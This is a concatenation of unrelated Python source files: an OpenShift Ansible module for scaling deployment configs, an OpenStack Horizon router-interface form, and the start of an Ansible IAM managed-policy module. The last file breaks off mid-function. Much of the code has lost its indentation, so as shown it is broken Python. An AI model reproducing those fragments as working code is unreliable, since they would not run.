''' Generates and returns a temporary file name '''
with tempfile.NamedTemporaryFile(prefix=prefix, delete=False) as tmp:
return tmp.name
@staticmethod
def create_tmp_files_from_contents(content, content_type=None):
'''Turn an array of dict: filename, content into a files array'''
if not isinstance(content, list):
content = [content]
files = []
for item in content:
path = Utils.create_tmp_file_from_contents(item['path'] + '-',
item['data'],
ftype=content_type)
files.append({'name': os.path.basename(item['path']),
'path': path})
return files
@staticmethod
def cleanup(files):
'''Clean up on exit '''
for sfile in files:
if os.path.exists(sfile):
if os.path.isdir(sfile):
shutil.rmtree(sfile)
elif os.path.isfile(sfile):
os.remove(sfile)
@staticmethod
def exists(results, _name):
''' Check to see if the results include the name '''
if not results:
return False
if Utils.find_result(results, _name):
return True
return False
@staticmethod
def find_result(results, _name):
''' Find the specified result by name'''
rval = None
for result in results:
if 'metadata' in result and result['metadata']['name'] == _name:
rval = result
break
return rval
@staticmethod
def get_resource_file(sfile, sfile_type='yaml'):
''' return the service file '''
contents = None
with open(sfile) as sfd:
contents = sfd.read()
if sfile_type == 'yaml':
# AUDIT:no-member makes sense here due to ruamel.YAML/PyYAML usage
# pylint: disable=no-member
if hasattr(yaml, 'RoundTripLoader'):
contents = yaml.load(contents, yaml.RoundTripLoader)
else:
contents = yaml.safe_load(contents)
elif sfile_type == 'json':
contents = json.loads(contents)
return contents
@staticmethod
def filter_versions(stdout):
''' filter the oc version output '''
version_dict = {}
version_search = ['oc', 'openshift', 'kubernetes']
for line in stdout.strip().split('\n'):
for term in version_search:
if not line:
continue
if line.startswith(term):
version_dict[term] = line.split()[-1]
# horrible hack to get openshift version in Openshift 3.2
        # By default "oc version" in 3.2 does not return an "openshift" version
if "openshift" not in version_dict:
version_dict["openshift"] = version_dict["oc"]
return version_dict
@staticmethod
def add_custom_versions(versions):
''' create custom versions strings '''
versions_dict = {}
for tech, version in versions.items():
# clean up "-" from version
if "-" in version:
version = version.split("-")[0]
if version.startswith('v'):
version = version[1:] # Remove the 'v' prefix
versions_dict[tech + '_numeric'] = version.split('+')[0]
# "3.3.0.33" is what we have, we want "3.3"
versions_dict[tech + '_short'] = "{}.{}".format(*version.split('.'))
return versions_dict
@staticmethod
def openshift_installed():
''' check if openshift is installed '''
import rpm
transaction_set = rpm.TransactionSet()
rpmquery = transaction_set.dbMatch("name", "atomic-openshift")
return rpmquery.count() > 0
# Disabling too-many-branches. This is a yaml dictionary comparison function
# pylint: disable=too-many-branches,too-many-return-statements,too-many-statements
@staticmethod
def check_def_equal(user_def, result_def, skip_keys=None, debug=False):
''' Given a user defined definition, compare it with the results given back by our query. '''
# Currently these values are autogenerated and we do not need to check them
skip = ['metadata', 'status']
if skip_keys:
skip.extend(skip_keys)
for key, value in result_def.items():
if key in skip:
continue
# Both are lists
if isinstance(value, list):
if key not in user_def:
if debug:
print('User data does not have key [%s]' % key)
print('User data: %s' % user_def)
return False
if not isinstance(user_def[key], list):
if debug:
print('user_def[key] is not a list key=[%s] user_def[key]=%s' % (key, user_def[key]))
return False
if len(user_def[key]) != len(value):
if debug:
print("List lengths are not equal.")
print("key=[%s]: user_def[%s] != value[%s]" % (key, len(user_def[key]), len(value)))
print("user_def: %s" % user_def[key])
print("value: %s" % value)
return False
for values in zip(user_def[key], value):
if isinstance(values[0], dict) and isinstance(values[1], dict):
if debug:
print('sending list - list')
print(type(values[0]))
print(type(values[1]))
result = Utils.check_def_equal(values[0], values[1], skip_keys=skip_keys, debug=debug)
if not result:
print('list compare returned false')
return False
elif value != user_def[key]:
if debug:
print('value should be identical')
print(user_def[key])
print(value)
return False
# recurse on a dictionary
elif isinstance(value, dict):
if key not in user_def:
if debug:
print("user_def does not have key [%s]" % key)
return False
if not isinstance(user_def[key], dict):
if debug:
print("dict returned false: not instance of dict")
return False
# before passing ensure keys match
api_values = set(value.keys()) - set(skip)
user_values = set(user_def[key].keys()) - set(skip)
if api_values != user_values:
if debug:
print("keys are not equal in dict")
print(user_values)
print(api_values)
return False
result = Utils.check_def_equal(user_def[key], value, skip_keys=skip_keys, debug=debug)
if not result:
if debug:
print("dict returned false")
print(result)
return False
# Verify each key, value pair is the same
else:
if key not in user_def or value != user_def[key]:
if debug:
print("value not equal; user_def does not have key")
print(key)
print(value)
if key in user_def:
print(user_def[key])
return False
if debug:
print('returning true')
return True
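# Illustrative sketch (hypothetical values, not used by this module): what
# Utils.add_custom_versions derives from a raw `oc version` string.
def _versions_example():
    out = Utils.add_custom_versions({'oc': 'v3.6.173.0.5-3.git.0.f8e9d1f'})
    # out == {'oc_numeric': '3.6.173.0.5', 'oc_short': '3.6'}
    return out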
class OpenShiftCLIConfig(object):
'''Generic Config'''
def __init__(self, rname, namespace, kubeconfig, options):
self.kubeconfig = kubeconfig
self.name = rname
self.namespace = namespace
self._options = options
@property
def config_options(self):
''' return config options '''
return self._options
def to_option_list(self, ascommalist=''):
'''return all options as a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs'''
return self.stringify(ascommalist)
def stringify(self, ascommalist=''):
''' return the options hash as cli params in a string
if ascommalist is set to the name of a key, and
the value of that key is a dict, format the dict
as a list of comma delimited key=value pairs '''
rval = []
for key in sorted(self.config_options.keys()):
data = self.config_options[key]
if data['include'] \
and (data['value'] is not None or isinstance(data['value'], int)):
if key == ascommalist:
val = ','.join(['{}={}'.format(kk, vv) for kk, vv in sorted(data['value'].items())])
else:
val = data['value']
rval.append('--{}={}'.format(key.replace('_', '-'), val))
return rval
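# Illustrative sketch (hypothetical values, not used by this module): how
# OpenShiftCLIConfig turns an options hash into CLI parameters, including the
# ascommalist handling for dict-valued keys.
def _config_options_example():
    opts = {'replicas': {'value': 3, 'include': True},
            'labels': {'value': {'app': 'php', 'tier': 'web'}, 'include': True}}
    cfg = OpenShiftCLIConfig('php', 'default', '/etc/origin/master/admin.kubeconfig', opts)
    return cfg.to_option_list(ascommalist='labels')
    # -> ['--labels=app=php,tier=web', '--replicas=3']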
# -*- -*- -*- End included fragment: lib/base.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/deploymentconfig.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class DeploymentConfig(Yedit):
''' Class to model an openshift DeploymentConfig'''
default_deployment_config = '''
apiVersion: v1
kind: DeploymentConfig
metadata:
name: default_dc
namespace: default
spec:
replicas: 0
selector:
default_dc: default_dc
strategy:
resources: {}
rollingParams:
intervalSeconds: 1
maxSurge: 0
maxUnavailable: 25%
timeoutSeconds: 600
updatePercent: -25
updatePeriodSeconds: 1
type: Rolling
template:
metadata:
spec:
containers:
- env:
- name: default
value: default
image: default
imagePullPolicy: IfNotPresent
name: default_dc
ports:
- containerPort: 8000
hostPort: 8000
protocol: TCP
name: default_port
resources: {}
terminationMessagePath: /dev/termination-log
dnsPolicy: ClusterFirst
hostNetwork: true
nodeSelector:
type: compute
restartPolicy: Always
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
triggers:
- type: ConfigChange
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content=None):
''' Constructor for deploymentconfig '''
if not content:
content = DeploymentConfig.default_deployment_config
super(DeploymentConfig, self).__init__(content=content)
def add_env_value(self, key, value):
''' add key, value pair to env array '''
rval = False
env = self.get_env_vars()
if env:
env.append({'name': key, 'value': value})
rval = True
else:
result = self.put(DeploymentConfig.env_path, {'name': key, 'value': value})
rval = result[0]
return rval
def exists_env_value(self, key, value):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
if 'value' not in result:
if value == "" or value is None:
return True
elif result['value'] == value:
return True
return False
def exists_env_key(self, key):
''' return whether a key, value pair exists '''
results = self.get_env_vars()
if not results:
return False
for result in results:
if result['name'] == key:
return True
return False
def get_env_var(self, key):
        '''return a single environment variable '''
results = self.get(DeploymentConfig.env_path) or []
if not results:
return None
for env_var in results:
if env_var['name'] == key:
return env_var
return None
def get_env_vars(self):
        '''return the environment variables '''
return self.get(DeploymentConfig.env_path) or []
def delete_env_var(self, keys):
'''delete a list of keys '''
if not isinstance(keys, list):
keys = [keys]
env_vars_array = self.get_env_vars()
modified = False
        for key in keys:
            idx = None
            for env_idx, env_var in enumerate(env_vars_array):
                if env_var['name'] == key:
                    idx = env_idx
                    break
            if idx is not None:
                modified = True
                del env_vars_array[idx]
if modified:
return True
return False
def update_env_var(self, key, value):
'''place an env in the env var list'''
env_vars_array = self.get_env_vars()
idx = None
for env_idx, env_var in enumerate(env_vars_array):
if env_var['name'] == key:
idx = env_idx
break
        if idx is not None:
env_vars_array[idx]['value'] = value
else:
self.add_env_value(key, value)
return True
def exists_volume_mount(self, volume_mount):
''' return whether a volume mount exists '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts:
return False
volume_mount_found = False
for exist_volume_mount in exist_volume_mounts:
if exist_volume_mount['name'] == volume_mount['name']:
volume_mount_found = True
break
return volume_mount_found
def exists_volume(self, volume):
''' return whether a volume exists '''
exist_volumes = self.get_volumes()
volume_found = False
for exist_volume in exist_volumes:
if exist_volume['name'] == volume['name']:
volume_found = True
break
return volume_found
def find_volume_by_name(self, volume, mounts=False):
''' return the index of a volume '''
volumes = []
if mounts:
volumes = self.get_volume_mounts()
else:
volumes = self.get_volumes()
for exist_volume in volumes:
if exist_volume['name'] == volume['name']:
return exist_volume
return None
def get_replicas(self):
''' return replicas setting '''
return self.get(DeploymentConfig.replicas_path)
def get_volume_mounts(self):
'''return volume mount information '''
return self.get_volumes(mounts=True)
def get_volumes(self, mounts=False):
        '''return volume information '''
if mounts:
return self.get(DeploymentConfig.volume_mounts_path) or []
return self.get(DeploymentConfig.volumes_path) or []
def delete_volume_by_name(self, volume):
'''delete a volume '''
modified = False
exist_volume_mounts = self.get_volume_mounts()
exist_volumes = self.get_volumes()
del_idx = None
for idx, exist_volume in enumerate(exist_volumes):
if 'name' in exist_volume and exist_volume['name'] == volume['name']:
del_idx = idx
break
        if del_idx is not None:
            del exist_volumes[del_idx]
            modified = True
del_idx = None
for idx, exist_volume_mount in enumerate(exist_volume_mounts):
if 'name' in exist_volume_mount and exist_volume_mount['name'] == volume['name']:
del_idx = idx
break
        if del_idx is not None:
            del exist_volume_mounts[del_idx]
            modified = True
return modified
def add_volume_mount(self, volume_mount):
''' add a volume or volume mount to the proper location '''
exist_volume_mounts = self.get_volume_mounts()
if not exist_volume_mounts and volume_mount:
self.put(DeploymentConfig.volume_mounts_path, [volume_mount])
else:
exist_volume_mounts.append(volume_mount)
def add_volume(self, volume):
''' add a volume or volume mount to the proper location '''
exist_volumes = self.get_volumes()
if not volume:
return
if not exist_volumes:
self.put(DeploymentConfig.volumes_path, [volume])
else:
exist_volumes.append(volume)
def update_replicas(self, replicas):
''' update replicas value '''
self.put(DeploymentConfig.replicas_path, replicas)
def update_volume(self, volume):
        '''update a volume in the volume list'''
exist_volumes = self.get_volumes()
if not volume:
return False
# update the volume
update_idx = None
for idx, exist_vol in enumerate(exist_volumes):
if exist_vol['name'] == volume['name']:
update_idx = idx
break
        if update_idx is not None:
exist_volumes[update_idx] = volume
else:
self.add_volume(volume)
return True
def update_volume_mount(self, volume_mount):
        '''update a volume mount in the volume mount list'''
modified = False
exist_volume_mounts = self.get_volume_mounts()
if not volume_mount:
return False
# update the volume mount
for exist_vol_mount in exist_volume_mounts:
if exist_vol_mount['name'] == volume_mount['name']:
if 'mountPath' in exist_vol_mount and \
str(exist_vol_mount['mountPath']) != str(volume_mount['mountPath']):
exist_vol_mount['mountPath'] = volume_mount['mountPath']
modified = True
break
if not modified:
self.add_volume_mount(volume_mount)
modified = True
return modified
def needs_update_volume(self, volume, volume_mount):
''' verify a volume update is needed '''
exist_volume = self.find_volume_by_name(volume)
exist_volume_mount = self.find_volume_by_name(volume, mounts=True)
results = []
results.append(exist_volume['name'] == volume['name'])
if 'secret' in volume:
results.append('secret' in exist_volume)
results.append(exist_volume['secret']['secretName'] == volume['secret']['secretName'])
results.append(exist_volume_mount['name'] == volume_mount['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'emptyDir' in volume:
results.append(exist_volume_mount['name'] == volume['name'])
results.append(exist_volume_mount['mountPath'] == volume_mount['mountPath'])
elif 'persistentVolumeClaim' in volume:
pvc = 'persistentVolumeClaim'
results.append(pvc in exist_volume)
if results[-1]:
results.append(exist_volume[pvc]['claimName'] == volume[pvc]['claimName'])
if 'claimSize' in volume[pvc]:
results.append(exist_volume[pvc]['claimSize'] == volume[pvc]['claimSize'])
        elif 'hostPath' in volume:
results.append('hostPath' in exist_volume)
results.append(exist_volume['hostPath']['path'] == volume_mount['mountPath'])
return not all(results)
def needs_update_replicas(self, replicas):
''' verify whether a replica update is needed '''
current_reps = self.get(DeploymentConfig.replicas_path)
        return current_reps != replicas
# -*- -*- -*- End included fragment: lib/deploymentconfig.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: lib/replicationcontroller.py -*- -*- -*-
# pylint: disable=too-many-public-methods
class ReplicationController(DeploymentConfig):
''' Class to model a replicationcontroller openshift object.
        Currently it is modeled after a deployment config since the two
        are very similar. In the future, when the need arises, we will
        add functionality to this class.
'''
replicas_path = "spec.replicas"
env_path = "spec.template.spec.containers[0].env"
volumes_path = "spec.template.spec.volumes"
container_path = "spec.template.spec.containers"
volume_mounts_path = "spec.template.spec.containers[0].volumeMounts"
def __init__(self, content):
''' Constructor for ReplicationController '''
super(ReplicationController, self).__init__(content=content)
# -*- -*- -*- End included fragment: lib/replicationcontroller.py -*- -*- -*-
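# Illustrative note (not part of the original fragments): the *_path class
# attributes above, e.g. 'spec.template.spec.containers[0].env', are dotted
# lookup strings. The base class get()/put() helpers that consume them are
# not shown in this fragment; a minimal sketch of how such a path could be
# resolved against the parsed yaml_dict (a hypothetical helper, assuming
# plain dict/list nesting) is:
#
#     def resolve(obj, path):
#         for part in path.replace(']', '').replace('[', '.').split('.'):
#             obj = obj[int(part)] if part.isdigit() else obj[part]
#         return obj
#
#     # resolve(rc.yaml_dict, ReplicationController.replicas_path)
#     # would return the replica count.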
# -*- -*- -*- Begin included fragment: class/oc_scale.py -*- -*- -*-
# pylint: disable=too-many-instance-attributes
class OCScale(OpenShiftCLI):
''' Class to wrap the oc command line tools '''
    # pylint allows a maximum of 5 arguments by default
# pylint: disable=too-many-arguments
def __init__(self,
resource_name,
namespace,
replicas,
kind,
kubeconfig='/etc/origin/master/admin.kubeconfig',
verbose=False):
''' Constructor for OCScale '''
super(OCScale, self).__init__(namespace, kubeconfig=kubeconfig, verbose=verbose)
self.kind = kind
self.replicas = replicas
self.name = resource_name
self._resource = None
@property
def resource(self):
''' property function for resource var '''
if not self._resource:
self.get()
return self._resource
@resource.setter
def resource(self, data):
''' setter function for resource var '''
self._resource = data
def get(self):
'''return replicas information '''
vol = self._get(self.kind, self.name)
if vol['returncode'] == 0:
if self.kind == 'dc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = DeploymentConfig(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
if self.kind == 'rc':
# The resource returned from a query could be an rc or dc.
# pylint: disable=redefined-variable-type
self.resource = ReplicationController(content=vol['results'][0])
vol['results'] = [self.resource.get_replicas()]
return vol
def put(self):
        '''update the replica count on the dc or rc '''
self.resource.update_replicas(self.replicas)
return self._replace_content(self.kind, self.name, self.resource.yaml_dict)
def needs_update(self):
''' verify whether an update is needed '''
return self.resource.needs_update_replicas(self.replicas)
# pylint: disable=too-many-return-statements
@staticmethod
def run_ansible(params, check_mode):
'''run the oc_scale module'''
oc_scale = OCScale(params['name'],
params['namespace'],
params['replicas'],
params['kind'],
params['kubeconfig'],
verbose=params['debug'])
state = params['state']
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
#####
# Get
#####
if state == 'list':
return {'changed': False, 'result': api_rval['results'], 'state': 'list'} # noqa: E501
elif state == 'present':
########
# Update
########
if oc_scale.needs_update():
if check_mode:
return {'changed': True, 'result': 'CHECK_MODE: Would have updated.'} # noqa: E501
api_rval = oc_scale.put()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
# return the created object
api_rval = oc_scale.get()
if api_rval['returncode'] != 0:
return {'failed': True, 'msg': api_rval}
return {'changed': True, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'changed': False, 'result': api_rval['results'], 'state': 'present'} # noqa: E501
return {'failed': True, 'msg': 'Unknown state passed. [{}]'.format(state)}
# -*- -*- -*- End included fragment: class/oc_scale.py -*- -*- -*-
# -*- -*- -*- Begin included fragment: ansible/oc_scale.py -*- -*- -*-
def main():
'''
ansible oc module for scaling
'''
module = AnsibleModule(
argument_spec=dict(
kubeconfig=dict(default='/etc/origin/master/admin.kubeconfig', type='str'),
state=dict(default='present', type='str', choices=['present', 'list']),
debug=dict(default=False, type='bool'),
kind=dict(default='dc', choices=['dc', 'rc'], type='str'),
namespace=dict(default='default', type='str'),
replicas=dict(default=None, type='int'),
name=dict(default=None, type='str'),
),
supports_check_mode=True,
)
rval = OCScale.run_ansible(module.params, module.check_mode)
if 'failed' in rval:
module.fail_json(**rval)
module.exit_json(**rval)
if __name__ == '__main__':
main()
# -*- -*- -*- End included fragment: ansible/oc_scale.py -*- -*- -*-
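# Illustrative usage (a sketch, not part of the module): installed as an
# Ansible module, scaling a deploymentconfig could look like the task below;
# the name and namespace values are hypothetical.
#
#   - name: scale the router dc to 3 replicas
#     oc_scale:
#       kind: dc
#       name: router
#       namespace: default
#       replicas: 3
#       state: present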
| apache-2.0 |
AlexOugh/horizon | openstack_dashboard/dashboards/project/routers/ports/forms.py | 32 | 7792 | # Copyright 2012, Nachi Ueno, NTT MCL, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class AddInterface(forms.SelfHandlingForm):
subnet_id = forms.ChoiceField(label=_("Subnet"))
ip_address = forms.IPField(
label=_("IP Address (optional)"), required=False, initial="",
help_text=_("Specify an IP address for the interface "
"created (e.g. 192.168.0.254)."),
version=forms.IPv4 | forms.IPv6, mask=False)
router_name = forms.CharField(label=_("Router Name"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
router_id = forms.CharField(label=_("Router ID"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
failure_url = 'horizon:project:routers:detail'
def __init__(self, request, *args, **kwargs):
super(AddInterface, self).__init__(request, *args, **kwargs)
c = self.populate_subnet_id_choices(request)
self.fields['subnet_id'].choices = c
def populate_subnet_id_choices(self, request):
tenant_id = self.request.user.tenant_id
networks = []
try:
networks = api.neutron.network_list_for_tenant(request, tenant_id)
except Exception as e:
msg = _('Failed to get network list %s') % e
LOG.info(msg)
messages.error(request, msg)
router_id = request.REQUEST.get('router_id',
self.initial.get('router_id'))
if router_id:
redirect = reverse(self.failure_url, args=[router_id])
else:
redirect = reverse('horizon:project:routers:index')
exceptions.handle(request, msg, redirect=redirect)
return
choices = []
for n in networks:
net_name = n.name + ': ' if n.name else ''
choices += [(subnet.id,
'%s%s (%s)' % (net_name, subnet.cidr,
subnet.name or subnet.id))
for subnet in n['subnets']]
if choices:
choices.insert(0, ("", _("Select Subnet")))
else:
choices.insert(0, ("", _("No subnets available")))
return choices
def handle(self, request, data):
if data['ip_address']:
port = self._add_interface_by_port(request, data)
else:
port = self._add_interface_by_subnet(request, data)
msg = _('Interface added')
if port:
msg += ' ' + port.fixed_ips[0]['ip_address']
LOG.debug(msg)
messages.success(request, msg)
return True
def _add_interface_by_subnet(self, request, data):
router_id = data['router_id']
try:
router_inf = api.neutron.router_add_interface(
request, router_id, subnet_id=data['subnet_id'])
except Exception as e:
self._handle_error(request, router_id, e)
try:
port = api.neutron.port_get(request, router_inf['port_id'])
except Exception:
            # Ignore an error from port_get(); it is only used to fetch
            # an IP address to display for the new interface.
port = None
return port
def _add_interface_by_port(self, request, data):
router_id = data['router_id']
subnet_id = data['subnet_id']
try:
subnet = api.neutron.subnet_get(request, subnet_id)
except Exception:
msg = _('Unable to get subnet "%s"') % subnet_id
self._handle_error(request, router_id, msg)
try:
ip_address = data['ip_address']
body = {'network_id': subnet.network_id,
'fixed_ips': [{'subnet_id': subnet.id,
'ip_address': ip_address}]}
port = api.neutron.port_create(request, **body)
except Exception as e:
self._handle_error(request, router_id, e)
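        # Attach the pre-created port to the router; if attaching fails,
        # roll back by deleting the port so it is not leaked.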
try:
api.neutron.router_add_interface(request, router_id,
port_id=port.id)
except Exception as e:
self._delete_port(request, port)
self._handle_error(request, router_id, e)
return port
def _handle_error(self, request, router_id, reason):
msg = _('Failed to add_interface: %s') % reason
LOG.info(msg)
redirect = reverse(self.failure_url, args=[router_id])
exceptions.handle(request, msg, redirect=redirect)
def _delete_port(self, request, port):
try:
api.neutron.port_delete(request, port.id)
except Exception:
msg = _('Failed to delete port %s') % port.id
LOG.info(msg)
exceptions.handle(request, msg)
class SetGatewayForm(forms.SelfHandlingForm):
network_id = forms.ChoiceField(label=_("External Network"))
router_name = forms.CharField(label=_("Router Name"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
router_id = forms.CharField(label=_("Router ID"),
widget=forms.TextInput(
attrs={'readonly': 'readonly'}))
failure_url = 'horizon:project:routers:index'
def __init__(self, request, *args, **kwargs):
super(SetGatewayForm, self).__init__(request, *args, **kwargs)
c = self.populate_network_id_choices(request)
self.fields['network_id'].choices = c
def populate_network_id_choices(self, request):
search_opts = {'router:external': True}
try:
networks = api.neutron.network_list(request, **search_opts)
except Exception as e:
msg = _('Failed to get network list %s') % e
LOG.info(msg)
messages.error(request, msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
return
choices = [(network.id, network.name or network.id)
for network in networks]
if choices:
choices.insert(0, ("", _("Select network")))
else:
choices.insert(0, ("", _("No networks available")))
return choices
def handle(self, request, data):
try:
api.neutron.router_add_gateway(request,
data['router_id'],
data['network_id'])
msg = _('Gateway interface is added')
LOG.debug(msg)
messages.success(request, msg)
return True
except Exception as e:
msg = _('Failed to set gateway %s') % e
LOG.info(msg)
redirect = reverse(self.failure_url)
exceptions.handle(request, msg, redirect=redirect)
| apache-2.0 |
sgerhart/ansible | lib/ansible/modules/cloud/amazon/iam_managed_policy.py | 30 | 15814 | #!/usr/bin/python
# Copyright: Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: iam_managed_policy
short_description: Manage User Managed IAM policies
description:
- Allows creating and removing managed IAM policies
version_added: "2.4"
options:
policy_name:
description:
- The name of the managed policy.
required: True
policy_description:
description:
      - A helpful description of this policy; this value is immutable and is only set when creating a new policy.
default: ''
policy:
description:
      - A properly JSON-formatted policy
make_default:
description:
- Make this revision the default revision.
default: True
only_version:
description:
- Remove all other non default revisions, if this is used with C(make_default) it will result in all other versions of this policy being deleted.
type: bool
default: 'no'
state:
description:
- Should this managed policy be present or absent. Set to absent to detach all entities from this policy and remove it if found.
default: present
choices: [ "present", "absent" ]
author: "Dan Kozlowski (@dkhenry)"
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
- botocore
'''
EXAMPLES = '''
# Create Policy ex nihilo
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy_description: "A Helpful managed policy"
policy: "{{ lookup('template', 'managed_policy.json.j2') }}"
state: present
# Update a policy with a new default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{{ lookup('file', 'managed_policy_update.json') }}"
state: present
# Update a policy with a new non default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{{ lookup('file', 'managed_policy_update.json') }}"
make_default: false
state: present
# Update a policy and make it the only version and the default version
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
policy: "{ 'Version': '2012-10-17', 'Statement':[{'Effect': 'Allow','Action': '*','Resource': '*'}]}"
only_version: true
state: present
# Remove a policy
- name: Create IAM Managed Policy
iam_managed_policy:
policy_name: "ManagedPolicy"
state: absent
'''
RETURN = '''
policy:
description: Returns the policy json structure, when state == absent this will return the value of the removed policy.
returned: success
type: string
sample: '{
"arn": "arn:aws:iam::aws:policy/AdministratorAccess "
"attachment_count": 0,
"create_date": "2017-03-01T15:42:55.981000+00:00",
"default_version_id": "v1",
"is_attachable": true,
"path": "/",
"policy_id": "ANPALM4KLDMTFXGOOJIHL",
"policy_name": "AdministratorAccess",
"update_date": "2017-03-01T15:42:55.981000+00:00"
}'
'''
import json
import traceback
try:
import botocore
except ImportError:
pass # caught by imported HAS_BOTO3
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ec2 import (boto3_conn, get_aws_connection_info, ec2_argument_spec, AWSRetry,
camel_dict_to_snake_dict, HAS_BOTO3, compare_policies)
from ansible.module_utils._text import to_native
@AWSRetry.backoff(tries=5, delay=5, backoff=2.0)
def list_policies_with_backoff(iam):
paginator = iam.get_paginator('list_policies')
return paginator.paginate(Scope='Local').build_full_result()
def get_policy_by_name(module, iam, name):
try:
response = list_policies_with_backoff(iam)
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policies: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for policy in response['Policies']:
if policy['PolicyName'] == name:
return policy
return None
def delete_oldest_non_default_version(module, iam, policy):
try:
versions = [v for v in iam.list_policy_versions(PolicyArn=policy['Arn'])['Versions']
if not v['IsDefaultVersion']]
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
versions.sort(key=lambda v: v['CreateDate'], reverse=True)
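    # after the reverse sort the oldest version is last, so versions[-1:]
    # selects only the oldest non-default version for deletion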
for v in versions[-1:]:
try:
iam.delete_policy_version(PolicyArn=policy['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
# This needs to return policy_version, changed
def get_or_create_policy_version(module, iam, policy, policy_document):
try:
versions = iam.list_policy_versions(PolicyArn=policy['Arn'])['Versions']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
try:
document = iam.get_policy_version(PolicyArn=policy['Arn'],
VersionId=v['VersionId'])['PolicyVersion']['Document']
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't get policy version %s: %s" % (v['VersionId'], str(e)),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
        # If this existing version's document matches the requested policy, reuse it
if not compare_policies(document, json.loads(to_native(policy_document))):
return v, False
# No existing version so create one
# There is a service limit (typically 5) of policy versions.
#
# Rather than assume that it is 5, we'll try to create the policy
# and if that doesn't work, delete the oldest non default policy version
# and try again.
try:
version = iam.create_policy_version(PolicyArn=policy['Arn'], PolicyDocument=policy_document)['PolicyVersion']
return version, True
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == 'LimitExceeded':
delete_oldest_non_default_version(module, iam, policy)
try:
version = iam.create_policy_version(PolicyArn=policy['Arn'], PolicyDocument=policy_document)['PolicyVersion']
return version, True
            except botocore.exceptions.ClientError as second_e:
                # keep a reference: Python 3 unbinds the `as` target when
                # this except block exits, and fail_json below still uses it
                e = second_e
# Handle both when the exception isn't LimitExceeded or
# the second attempt still failed
module.fail_json(msg="Couldn't create policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
def set_if_default(module, iam, policy, policy_version, is_default):
if is_default and not policy_version['IsDefaultVersion']:
try:
iam.set_default_policy_version(PolicyArn=policy['Arn'], VersionId=policy_version['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't set default policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
return True
return False
def set_if_only(module, iam, policy, policy_version, is_only):
if is_only:
try:
versions = [v for v in iam.list_policy_versions(PolicyArn=policy['Arn'])[
'Versions'] if not v['IsDefaultVersion']]
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't list policy versions: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
for v in versions:
try:
iam.delete_policy_version(PolicyArn=policy['Arn'], VersionId=v['VersionId'])
except botocore.exceptions.ClientError as e:
module.fail_json(msg="Couldn't delete policy version: %s" % str(e),
exception=traceback.format_exc(),
**camel_dict_to_snake_dict(e.response))
return len(versions) > 0
return False
def detach_all_entities(module, iam, policy, **kwargs):
try:
entities = iam.list_entities_for_policy(PolicyArn=policy['Arn'], **kwargs)
except botocore.exceptions.ClientError as e:
